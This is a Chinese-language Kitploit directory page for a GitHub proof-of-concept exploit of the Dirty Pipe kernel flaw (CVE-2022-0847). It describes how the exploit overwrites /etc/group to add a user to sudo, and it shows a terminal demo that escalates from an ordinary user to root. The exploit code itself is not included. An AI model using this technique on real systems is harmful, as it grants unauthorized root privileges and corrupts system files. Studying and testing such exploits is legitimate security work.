Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
dirty-pipe-poc — 针对 CVE-2022-0847 Dirty Pipe Vulnerability 的 POC 利用,可将用户添加至 Sudo | Kitploit
工具/GitHubGitHub/0xeremus/dirty-pipe-poc
权限提升漏洞分析漏洞利用渗透测试二进制利用
GitHub0xeremus/dirty-pipe-poc

dirty-pipe-poc

针对 CVE-2022-0847 Dirty Pipe Vulnerability 的 POC 利用,可将用户添加至 Sudo

查看仓库
214年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

POC 利用:通过 CVE-2022-0847 Dirty Pipe 漏洞将用户添加到 sudo 组

本仓库基于 Max Kellermann 发现的漏洞、分析文章和利用代码,所有内容均可在此处找到。

和所有人一样,我也忍不住尝试玩弄这个世界上最易复现的权限提升漏洞,那篇博客文章对其解释得非常清楚。

我将利用代码翻译成了 Python,只是为了更好地理解它,但这是 C 语言利用代码的精确副本,其中硬编码了 Sudo 权限提升操作。

前提条件

Python 3.10(由于使用了 os.splice 调用)

不足之处

通过直接写入 sudo 条目后的下一行内容,导致 /etc/group 文件损坏。但当你获得 root 权限后,可以使用备份文件修复该问题。

会在 /tmp/group_backup 处放置 /etc/group 的副本。

演示

root@kitploit:~
test@kali:/home/user/working$ whoami
test
test@kali:/home/user/working$ sudo whoami
test is not in the sudoers file.  This incident will be reported.
test@kali:/home/user/working$ python3.10 poc.py
[*] Dirty PIPE POC [*]
[*] Exploit will add test to sudoers
[*] Finding offset of sudo entry in /etc/group
[*] Found sudo group offset
[*] Confirmed it is not last.
[*] Opening /etc/group
[*] Opening PIPE
[*] Contaminating flags of pipe buffer
[*] 65536 bytes written to pipe
[*] 65536 bytes read from pipe
[*] Splicing byte from /etc/group to pipe
[*] Spliced 1 bytes
[*] Altering group to add test
[*] 6 bytes written to /etc/group
test@kali:/home/user/working$ su test
Password:
test@kali:/home/user/working$ sudo whoami
root
test@kali:/home/user/working$
下载工具